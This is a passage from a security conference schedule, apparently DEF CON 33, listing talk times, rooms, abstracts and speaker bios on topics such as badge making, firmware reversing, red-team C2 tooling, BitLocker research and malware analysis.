When: Friday, Aug 8, 17:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Behind every blinking LED and clever CTF is a mountain of caffeine, chaos, and carefully disguised panic. In this panel, veteran badge creators share their hard-earned lessons from years in the trenches of Badgelife - what worked, what absolutely didn’t, and what miraculously came together 12 hours before con opened. From catastrophic PCB errors and customs nightmares to soldering in hotel bathtubs, and shipping hacks that would make a logistics manager cry - we’ll break down the real behind-the-scenes stories that never make it to the badge booth. Whether you’re a first-time builder or a seasoned badge nerd, this is your survival guide (and therapy session) in one.

Speakers:Abhinav Pandagale,MakeItHackin

SpeakerBio:  Abhinav Pandagale, Founder at Hackerware.io

Abhinav's artistry comes from the times he used to sneakily paint drawings made by his sister. His hacking career began as a toddler, disassembling his toys but never put them back together. His entrepreneurial roots come from selling snacks at a school fair and making a loss of . Having learned how not to make money, he launched Hackerware.io - a boutique badgelife lab with in-house manufacturing - which has grown over the past nine years into a global presence across 19 countries. He’s often spotted at conferences around the world - hosting hardware villages or pulling off the kind of random shenanigans that earned him the Sin CON Person of the Year 2025 award.

SpeakerBio:  MakeItHackin, Badge Maker

MakeItHackin graduated with a physics degree and served in the Army before diving into electronics in 2016, the same year as his first DEF CON! He joined the badge-making scene at DEF CON 29, fueling a passion for reverse-engineering. With a love for tearing apart tech, he tinkers as a hobbyist, and has previously spoken at Physical Security Village, HOPE Conference, and Hackaday Supercon.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Sunday - 11:30-11:59 PDT


Title: Bare Metal Reverse Engineering
When: Sunday, Aug 10, 11:30 - 11:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

This talk presents a practical methodology for reverse engineering real-time embedded firmware built on ARM Cortex platforms. Using Ghidra as the primary analysis environment to facilitate collaboration. We will demonstrate how to reconstruct the core layers of an embedded system to gain deep insight into its operation. The Board Support Package (BSP) is mapped using the SVD loader plugin to associate memory-mapped registers with hardware peripherals. The Hardware Abstraction Layer (HAL) is analyzed through custom type recovery and function pattern matching to identify initialization routines and peripheral control logic. At the RTOS level, we apply Ghidra’s BSim plugin to detect task creation, scheduler logic, and inter-process communication constructs used in FreeRTOS and similar kernels. The session equips attendees with a structured approach to reversing embedded C/C++ applications, even when symbols are stripped and source code is unavailable. The goal is to enable firmware analysts, security researchers, and engineers to confidently dissect the layered architecture of constrained, real-time embedded systems.

SpeakerBio:  SolaSec

Caleb Davis is a founding member of SolaSec, a cybersecurity consulting firm specializing in advanced penetration testing for embedded and connected systems. Based in Dallas/Fort Worth, he holds a degree in Electrical Engineering from the University of Texas at Tyler and is a patent-holding expert with vast experience in hardware and firmware security. Caleb leads deep technical assessments across a range of high-impact industries, including medical devices, automotive, industrial control systems, ATMs and financial terminals, aerospace components, and consumer electronics. His work focuses on secure design, trusted boot processes, cryptographic implementations, and threat modeling, helping organizations integrate security throughout the development lifecycle and align with industry and regulatory standards.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 12:30-15:30 PDT


Title: Battle of the Bots: Vishing Edition
When: Saturday, Aug 9, 12:30 - 15:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Watch teams deploy AI-powered agents in a soundproof booth to place live vishing calls and hit preset objectives, pushing the limits of automation, hacking, and human psychology.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 10:00-10:45 PDT


Title: Beaconator C2 Framework
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

The Beaconator C2 framework provides multiple highly evasive payloads, created to provide red teams with code execution, versatility, and ease of use. It is intended to be a Swiss Army knife for evasive C2, with a unified listener and basic tools to manage an engagement. The goal is to empower red/purple teams to emulate emerging adversary tactics that are evasive, prove them out, and then open tickets with various AV/EDR vendors to improve detectability for these blind spots that are now exploited in the wild.

Speakers:Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" Woods

SpeakerBio:  Mike "CroodSolutions" Manrod

Mike serves as the CISO for Grand Canyon Education and adjunct faculty for Grand Canyon University, teaching malware analysis. Mike also co-founded the Threat Intelligence Support Unit (TISU), a community for threat and adversary research. He is also a co-author/contributor for the joint book project, Understanding New Security Threats published by Routledge in 2019, along with numerous articles. When not working, he spends time playing video games and doing random projects with his kids.

SpeakerBio:  Ezra "Shammahwoods" Woods

Ezra is an avid security researcher currently working as an information security engineer with Grand Canyon Education.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 15:00-15:45 PDT


Title: Beaconator C2 Framework
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

The Beaconator C2 framework provides multiple highly evasive payloads, created to provide red teams with code execution, versatility, and ease of use. It is intended to be a Swiss Army knife for evasive C2, with a unified listener and basic tools to manage an engagement. The goal is to empower red/purple teams to emulate emerging adversary tactics that are evasive, prove them out, and then open tickets with various AV/EDR vendors to improve detectability for these blind spots that are now exploited in the wild.

Speakers:Mike "CroodSolutions" Manrod,Ezra "Shammahwoods" Woods

SpeakerBio:  Mike "CroodSolutions" Manrod

Mike serves as the CISO for Grand Canyon Education and adjunct faculty for Grand Canyon University, teaching malware analysis. Mike also co-founded the Threat Intelligence Support Unit (TISU), a community for threat and adversary research. He is also a co-author/contributor for the joint book project, Understanding New Security Threats published by Routledge in 2019, along with numerous articles. When not working, he spends time playing video games and doing random projects with his kids.

SpeakerBio:  Ezra "Shammahwoods" Woods

Ezra is an avid security researcher currently working as an information security engineer with Grand Canyon Education.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 10:00-10:59 PDT


Title: Becoming a Caido Power User
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

No one can deny that the job of a bug bounty hunter is tedious at times. The goal of this talk is simple: to make you a more efficient hacker using Caido. There is a lot to cover, but you can expect content surrounding the following: AI integration, collaboration, automation (JIT and otherwise), efficient navigation, and a slew of new Caido features. Caido is a rapidly evolving tool - consider this your crash course on getting back up to speed.

SpeakerBio:  Justin "rhynorater" Gardner, Advisor at Caido

I'm a full-time Bug Bounty Hunter and Host of the Critical Thinking - Bug Bounty Podcast. I also work as an Advisor for Caido (HTTP Proxy). When I'm not putting in reports or disseminating technical info on the pod, I'm normally spending time with my wife and 2 daughters, lifting heavy things, playing volleyball, or getting folded in BJJ


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Saturday - 08:00-16:59 PDT


Title: Beginner's Guide to Attacks and Defenses
When: Saturday, Aug 9, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration

We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.

Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

SpeakerBio:  Sam Bowne, City College San Francisco

Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.

SpeakerBio:  Kaitlyn Handelman, Offensive Security Engineer at Amazon

Kaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.

SpeakerBio:  Irvin Lemus, Cyber Range Engineer at By Light IT Professional Services

Irvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."

SpeakerBio:  Elizabeth Biddlecome, Consultant and Instructor

Elizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Beginner's Guide to Attacks and Defenses
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration

We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.

Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

SpeakerBio:  Sam Bowne, City College San Francisco

Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.

SpeakerBio:  Kaitlyn Handelman, Offensive Security Engineer at Amazon

Kaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.

SpeakerBio:  Irvin Lemus, Cyber Range Engineer at By Light IT Professional Services

Irvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."

SpeakerBio:  Elizabeth Biddlecome, Consultant and Instructor

Elizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Beginner's Guide to Attacks and Defenses
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration

We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.

Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

SpeakerBio:  Sam Bowne, City College San Francisco

Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.

SpeakerBio:  Kaitlyn Handelman, Offensive Security Engineer at Amazon

Kaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.

SpeakerBio:  Irvin Lemus, Cyber Range Engineer at By Light IT Professional Services

Irvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."

SpeakerBio:  Elizabeth Biddlecome, Consultant and Instructor

Elizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Beginner's Guide to Attacks and Defenses
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration

We will survey modern attack and defense techniques at an introductory level. We will demonstrate all the techniques, and participants will perform hands-on projects practicing with the tools. We will provide beginner-friendly instructions, a live CTF scoreboard, and personal assistance.

Speakers:Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome

SpeakerBio:  Sam Bowne, City College San Francisco

Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, DEF CON China, Black Hat USA, HOPE, BSidesSF, BSidesLV, RSA, and many other conferences and colleges. He founded Infosec Decoded, Inc., and does corporate training and consulting for several Fortune 100 companies, on topics including Incident Response and Secure Coding.

SpeakerBio:  Kaitlyn Handelman, Offensive Security Engineer at Amazon

Kaitlyn Handelman is an offensive security engineer at Amazon. Her focus is cybersecurity in space. In addition to traditional penetration testing, Kaitlyn works on physical devices and RF signals. In her free time, she enjoys ham radio, astronomy, and her cat, Astrocat.

SpeakerBio:  Irvin Lemus, Cyber Range Engineer at By Light IT Professional Services

Irvin Lemus, CISSP is a Cyber Range Engineer at By Light IT Professional Services, training military personnel through international cyber security exercises. Irvin has been in the field since 2006, involved with cybersecurity competitions since 2015 as a trainer, coach, and mentor. He also has taught IT and Cybersecurity courses at Coastline and Cabrillo Colleges. He is the BACCC Cyber Competitions Regional Coordinator, Board member at Pacific Hackers and is a speaker at DEFCON. He describes himself as, "A professional troublemaker who loves hacking all the things."

SpeakerBio:  Elizabeth Biddlecome, Consultant and Instructor

Elizabeth Biddlecome is a consultant and instructor, delivering technical training and mentorship to students and professionals. She leverages her enthusiasm for architecture, security, and code to design and implement comprehensive information security solutions for business needs. Elizabeth enjoys wielding everything from soldering irons to cripting languages in cybersecurity competitions, hackathons, and CTFs.


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Sunday - 10:00-10:59 PDT


Title: Behind the Badge: How We Used and Abused Hardware (again) to Create the AV Badge for DC33
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

After DC32, we had one question for ourselves: How could we possibly build upon the work done with last year’s ADS-B badge? Building upon the work we talked about at 38C3, the badge became a mixture of ideas. We wanted new functions extend the badge, but also be accessible for everyone. That set our direction for this year: a radio SAO that would have multiple levels of connectivity. Join us for a behind-the-scenes look as we walk through how we were able to (ab)use hardware to receive out of band signals, creating a custom signal processing chain, and create an SAO that can be integrated into your own badge. Now that you’ve got your hands on this year’s Aerospace Village badge, join Adam and Robert as they discuss the challenges and successes the team faced while building this year’s village badge.

Speakers:Adam Batori,Robert Pafford

SpeakerBio:  Adam Batori, Rare Circuits
No BIO available
SpeakerBio:  Robert Pafford, Rare Circuits
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 12:00-12:59 PDT


Title: Behind The Dashboard - (Lack Of) Automotive Privacy
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

We usually view the world of cybersecurity through the lens of a malicious attacker versus a legitimate actor within a given system. This approach fails when considering the world of data privacy where there are three actors in play: the possibly-benevolent vendor, the legitimate user and the inevitable malicious actor. Using this privacy-focused lens, we survey the current regulatory landscape before turning our attention to how privacy is (not) applied to the automotive world.

Our talk focuses on the unique privacy risks the automotive industry is facing with the advent of smart, connected, cars. We present a real-world case study showing how quickly and thoroughly a bad actor could invade the privacy of a car owner, based on a privacy leak vulnerability designated CVE-2025-26313 (reserved).

Speakers:Lior ZL,Jacob Avidar

SpeakerBio:  Lior ZL, Security Researcher at PlaxidityX Threat Research Labs

Lior is a security researcher in the PlaxidityX Threat Research Labs. Lior is part of a team of security researchers and data scientists who focus on innovation in the cybersecurity world, both from an offensive and a defensive perspective. Lior’s past experience is in enterprise cybersecurity and systems development. Lior holds an M.Sc in Computer Science.

SpeakerBio:  Jacob Avidar, VP R&D and CISO at PlaxidityX

Jacob Avidar is the VP R&D and CISO of PlaxidityX (formerly Argus). Jacob founded the Threat Research Labs team that focuses on exploring high-risk vulnerabilities through cyber attacks in the Automotive industry. Exposing these risks allow OEMs and Tier-1 vendors to deal with violations and thus protect cars and people's lives from cyber attacks.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 15:00-15:30 PDT


Title: Beyond the Stack: How External Failures Impact Payments Security
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:

Payments infrastructure is often built with strong security and reliability guarantees but those guarantees can be undermined by failures in the systems it depends on. In this talk, we examine postmortems from real-world outages where the core payments systems remained robust, yet external or supporting infrastructure such as DNS, authentication services, cloud dependencies, or third-party integrations introduced vulnerabilities during periods of instability

SpeakerBio:  Tapan Khilnani

Tapan is an engineering manager with deep experience in building and scaling payment systems. With a background that spans global enterprises and early-stage startups, he brings a well-rounded perspective to technical and organizational challenges. He holds an engineering master’s degree, which grounds his practical work in strong technical foundations


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 18:00-21:59 PDT


Title: BIC Village Game Night
When: Friday, Aug 8, 18:00 - 21:59 PDT
Where: LVCCWest-Level3-W322-W324 - Map

Description:

Gamers Unite! Come join the BIC Village team to engage with one another, unplug and find some friendly competition! Whether you’re into board games, card games or classic party games, there’s something for everyone here. Bring your game face and get ready for a night of fun, laughter and connection.This event will feature different board games such as Jenga, Uno, Spades, Ludi and more from around the African Diaspora and Black American culture!


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 14:00-17:59 PDT


Title: Binary exploitation basics
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Leigh Trinity
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:00-10:20 PDT


Title: Binary Facades: Reversing approaches to extract embedded scripts in compiled macOS malware
When: Saturday, Aug 9, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

When confronted with malicious macOS binaries, analysts typically reach for a disassembler and immerse themselves in the complexities of low-level assembly. But what if this tedious process could be skipped entirely?

While many malware samples are distributed as native macOS binaries (easily run with a simple double-click), they frequently encapsulate scripts hidden within executable wrappers. Leveraging frameworks such as PyInstaller, Appify, Tauri, and Platypus, malware authors embed their scripts with binaries, complicating traditional analysis. Although these frameworks share the goal of producing natively executable binaries, each employs a distinct method to embed scripts, thus necessitating tailored extraction tools and approaches.

Using real-world macOS malware (such as Shlayer, CreativeUpdate, GravityRAT, and many others), we'll first demonstrate how to identify these faux binaries and then how to efficiently extract or reconstruct their embedded scripts, bypassing the disassembler entirely!

References:

SpeakerBio:  Patrick Wardle

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 16:00-16:30 PDT


Title: Bio-Cryptography is the Game-Genie in a post quantum dystopia
When: Friday, Aug 8, 16:00 - 16:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Defcon 32 we discussed how to transfect DNA using a lighter in the privacy of your home, Defcon 33 we want to bring the next phase which is BioCypher. BioCypher is a tool that will help with plasmid design to embed cryptographic messages. As quantum computing threatens traditional encryption, it’s time to ditch silicon and embrace self-assembling biomolecular firewalls. DNA Origami Cryptography (DOC) uses viral scaffolds to create nanometer-scale encryption keys over 700 bits long—strong enough to give Shor’s algorithm an existential crisis. Beyond brute-force resistance, DOC enables protein-binding steganography and multi-part message integrity, allowing encrypted communication through braille-like molecular folds. Whether securing classified data or encoding musical notes into microscopic strands, DOC offers a biological alternative to post-quantum doom. In this talk, we’ll explore how molecular self-assembly is turning DNA into the hacker-proof cipher of the future, now introducing Biocypher! The rough demo awaits for all to use the tool and think about a bio-crypto-future!

SpeakerBio:  James Utley, PhD

Dr. James Utley, PhD, is a Johns Hopkins-trained Immunohematology expert, CABP, and AI/data science leader. As Technical Director, he led 150K+ cellular transfusions, advancing DoD and FDA-approved therapies. A bold biohacker, he pioneers CRISPR/genetic engineering, earning the moniker “the pirate.”


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:00-10:45 PDT


Title: BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

In Windows, the cornerstone of data protection is BitLocker, a Full Volume Encryption technology designed to secure sensitive data on disk. This ensures that even if an adversary gains physical access to the device, the data remains secure and inaccessible.

One of the critical aspects of any data protection feature is its ability to support recovery operations failure cases. To support BitLocker recovery, design changes were applied in the Windows Recovery Environment (WinRE). This led us to a pivotal question: did these changes introduce new attack surfaces impacting BitLocker?

In this talk, we will share our journey of researching a fascinating and mysterious component: WinRE. Our exploration begins with an overview of the WinRE architecture, followed by a retrospective analysis of the attack surfaces exposed with the introduction of BitLocker. We will then discuss our methodology for effectively researching and exploiting these exposed attack surfaces. Our presentation will reveal how we identified multiple 0-day vulnerabilities and developed fully functional exploits, enabling us to bypass BitLocker and extract all protected data in several different ways.

Finally, we will share the insights Microsoft gained from this research and explain our approach to hardening WinRE, which in turn strengthens BitLocker.

Speakers:Alon "alon_leviev" Leviev,Netanel Ben Simon

SpeakerBio:  Alon "alon_leviev" Leviev

Alon Leviev (@alon_leviev) is a self-taught security researcher working with the Microsoft Offensive Research & Security Engineering (MORSE) team. Alon specializes in low-level vulnerability research targeting hardware, firmware, and Windows boot components. He has presented his findings at internationally-recognized security conferences such as DEF CON 32 (2024), Black Hat USA 2024, Black Hat EU 2023, CanSecWest 2024, and CONFidence 2024. Prior to his career in cybersecurity, Alon was a professional Brazilian jiu-jitsu athlete, winning several world and European titles.

SpeakerBio:  Netanel Ben Simon

Netanel Ben-Simon has been a security researcher for over eight years, and is currently working with the Microsoft Offensive Research & Security Engineering (MORSE) team. He specializes in low-level vulnerability research, fuzzing & Exploitation on various platform types such as Windows, Linux, and Embedded Devices. Over the past year, he has conducted in-depth vulnerability research on different UEFI components with a focus on Windows security posture around the boot environment, bug hunting and mitigations.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 10:00-10:45 PDT


Title: Blackdagger - Cyber Workflow Automation Framework
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Blackdagger is a next-gen cybersecurity workflow automation framework built to streamline and accelerate complex operations across DevSecOps, MLOps, MLSecOps, and Continuous Automated Red Teaming (CART). It uses a declarative YAML-based Directed Acyclic Graph (DAG) system to define, visualize, and execute automated pipelines — no heavy scripting required. With a built-in web UI, a containerized red teaming toolkit called Blackcart, and integration with GitHub Actions for OPSEC-friendly task execution, Blackdagger empowers teams to deploy, manage, and scale cyber workflows in real-time. Attendees will see live demos of red team pipelines, stealthy GitHub-based automation, and browser-based workflow execution via the Blackdagger Web Kit. Whether you're defending or attacking, Blackdagger turns security automation into an intuitive, visual experience — backed by real-world NATO and defense applications.

Speakers:Mahmut "ErdemOzgen" Erdem Ozgen,Ata Seren

SpeakerBio:  Mahmut "ErdemOzgen" Erdem Ozgen

Mahmut is a computer engineer from Ankara, Turkey, specializing in software engineering, cybersecurity, ML systems, and DevSecOps. A Bahcesehir University graduate (2015-2020), he has played key roles at HAVELSAN, developing secure DevSecOps pipelines and cybersecurity architectures for Turkish Armed Forces, contributing to national security systems advancement. He has extensive experience with machine learning and LLMs, applying theoretical concepts to practical solutions. As a student research assistant at Istanbul Big Data Education and Research Center, he implemented learning-based algorithms for drone routing and conducted text processing and sentiment analysis. His technical expertise encompasses Python, Go, C/C++, Java, JavaScript, Docker, Kubernetes, Terraform, and blockchain technologies. Fluent in English and Turkish, he has received notable recognition, including first place in the Presidency of Defence Industries Cyber Capstone Projects and a full scholarship from Bahcesehir University. Additionally, he has served on the NATO Locked Shields exercise green team, implementing ML and LLM-based systems, and currently serves as a red team capability leader in the NATO CWIX exercise.

SpeakerBio:  Ata Seren

Ata is a specialized cyber security engineer with expertise in application security, DevSecOps, and penetration testing. Currently pursuing a Master’s degree in Cyber Security at Middle East Technical University, his thesis focuses on static application security testing, tool mechanisms, and innovative approaches in the field. With professional experience at HAVELSAN, he has contributed to significant NATO projects and open-source cybersecurity tools including DevSecOpsBuilder, Blackcart, and Blackdagger. His involvement in the NATO Locked Shields exercise in 2024 and 2025 demonstrates his practical expertise in cyber defense operations at an international level. A recognized voice in the cybersecurity community, he has presented the Blackdagger tool at Black Hat USA, Europe, and Asia conferences alongside his colleague. Most recently, he spoke at CyCon 2025, introducing a new cybersecurity framework to industry professionals. His technical proficiency spans multiple programming languages including Python, Golang, and C/C++, complemented by extensive knowledge of cybersecurity fundamentals, cloud security, and AI/ML approaches to security challenges. He is currently expanding his red teaming capabilities while studying for the OSCP certification from OffSec.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 11:00-11:45 PDT


Title: Blackdagger - Cyber Workflow Automation Framework
When: Friday, Aug 8, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Blackdagger is a next-gen cybersecurity workflow automation framework built to streamline and accelerate complex operations across DevSecOps, MLOps, MLSecOps, and Continuous Automated Red Teaming (CART). It uses a declarative YAML-based Directed Acyclic Graph (DAG) system to define, visualize, and execute automated pipelines — no heavy scripting required. With a built-in web UI, a containerized red teaming toolkit called Blackcart, and integration with GitHub Actions for OPSEC-friendly task execution, Blackdagger empowers teams to deploy, manage, and scale cyber workflows in real-time. Attendees will see live demos of red team pipelines, stealthy GitHub-based automation, and browser-based workflow execution via the Blackdagger Web Kit. Whether you're defending or attacking, Blackdagger turns security automation into an intuitive, visual experience — backed by real-world NATO and defense applications.

Speakers:Mahmut "ErdemOzgen" Erdem Ozgen,Ata Seren

SpeakerBio:  Mahmut "ErdemOzgen" Erdem Ozgen

Mahmut is a computer engineer from Ankara, Turkey, specializing in software engineering, cybersecurity, ML systems, and DevSecOps. A Bahcesehir University graduate (2015-2020), he has played key roles at HAVELSAN, developing secure DevSecOps pipelines and cybersecurity architectures for Turkish Armed Forces, contributing to national security systems advancement. He has extensive experience with machine learning and LLMs, applying theoretical concepts to practical solutions. As a student research assistant at Istanbul Big Data Education and Research Center, he implemented learning-based algorithms for drone routing and conducted text processing and sentiment analysis. His technical expertise encompasses Python, Go, C/C++, Java, JavaScript, Docker, Kubernetes, Terraform, and blockchain technologies. Fluent in English and Turkish, he has received notable recognition, including first place in the Presidency of Defence Industries Cyber Capstone Projects and a full scholarship from Bahcesehir University. Additionally, he has served on the NATO Locked Shields exercise green team, implementing ML and LLM-based systems, and currently serves as a red team capability leader in the NATO CWIX exercise.

SpeakerBio:  Ata Seren

Ata is a specialized cyber security engineer with expertise in application security, DevSecOps, and penetration testing. Currently pursuing a Master’s degree in Cyber Security at Middle East Technical University, his thesis focuses on static application security testing, tool mechanisms, and innovative approaches in the field. With professional experience at HAVELSAN, he has contributed to significant NATO projects and open-source cybersecurity tools including DevSecOpsBuilder, Blackcart, and Blackdagger. His involvement in the NATO Locked Shields exercise in 2024 and 2025 demonstrates his practical expertise in cyber defense operations at an international level. A recognized voice in the cybersecurity community, he has presented the Blackdagger tool at Black Hat USA, Europe, and Asia conferences alongside his colleague. Most recently, he spoke at CyCon 2025, introducing a new cybersecurity framework to industry professionals. His technical proficiency spans multiple programming languages including Python, Golang, and C/C++, complemented by extensive knowledge of cybersecurity fundamentals, cloud security, and AI/ML approaches to security challenges. He is currently expanding his red teaming capabilities while studying for the OSCP certification from OffSec.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 19:00-00:59 PDT


Title: BlanketFort Con
When: Friday, Aug 8, 19:00 - 00:59 PDT
Where: LVCCWest-Level2-W231-W232 - Map

Description:
BlanketFort Con: Come for the chill vibes and diversity, stay for the Blanket Fort Building, Cool Lights, Music, and Kid Friendly \ Safe environment. Now with less Gluten and more animal onesies!

Return to Index    -    Add to Google    -    ics Calendar file

CHV - Sunday - 10:00-10:59 PDT


Title: Blind Trailer Shouting
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

